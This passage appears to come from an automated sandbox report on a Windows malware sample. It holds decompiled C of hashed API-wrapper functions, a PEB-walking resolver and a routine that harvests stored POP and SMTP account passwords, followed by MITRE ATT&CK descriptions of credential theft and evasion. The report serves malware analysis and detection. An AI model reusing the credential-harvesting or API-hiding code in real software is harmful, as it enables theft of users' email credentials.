				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}

0x004058f8
0x00405903
0x00405906

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}

0x00405932
0x0040593d
0x00405940

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D
SmtpAccount, xrefs: 0040D0FA
SmtpPort, xrefs: 0040D0EB
PopAccount, xrefs: 0040D0B6
PopServer, xrefs: 0040D099
PopPassword, xrefs: 0040D0D0
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}

0x0040317f
0x00403180
0x00403180
0x00403180
0x0040318d
0x00403196
0x00403199
0x0040319b
0x004031a1
0x004031a9
0x004031ab
0x004031ac
0x004031ae
0x00000000
0x004031b0
0x004031b3
0x004031c2
0x004031c7
0x004031cd
0x004031e0
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031d7
0x004031dd
0x004031cf
0x004031cf
0x004031d1
0x004031d5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cvtres.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

